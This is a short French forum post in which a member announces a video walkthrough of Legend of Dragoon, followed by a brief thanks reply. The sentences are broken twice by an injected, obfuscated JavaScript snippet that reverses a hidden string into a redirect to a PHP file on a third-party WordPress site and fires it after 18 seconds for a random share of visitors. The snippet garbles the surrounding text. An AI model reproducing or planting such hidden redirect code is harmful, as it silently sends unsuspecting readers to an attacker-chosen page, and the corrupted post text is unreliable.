Voila, je fais partie d'une équipe de testeurs de jeux vidéos sur le net et plusieurs d'entre nous se sont lancé dans l'enregistrement de walkthrough (solution vidéo).
à la dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de l'admin du site je me suis moi aussi lancé dans l'aventure avec un walkthrough de Legend of dragoon
je vous mets donc le lien du site et je vous dirais qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and est-ce que l'épisode 1 sortira ^^
http://www.lachambredugamer.fr/walkthrough
WALKTHROUGH Legend of Dragoon
- giuliani
- Dragon de Jade
Re: WALKTHROUGH Legend of dragoon
Nickel c'est cool , merci Yami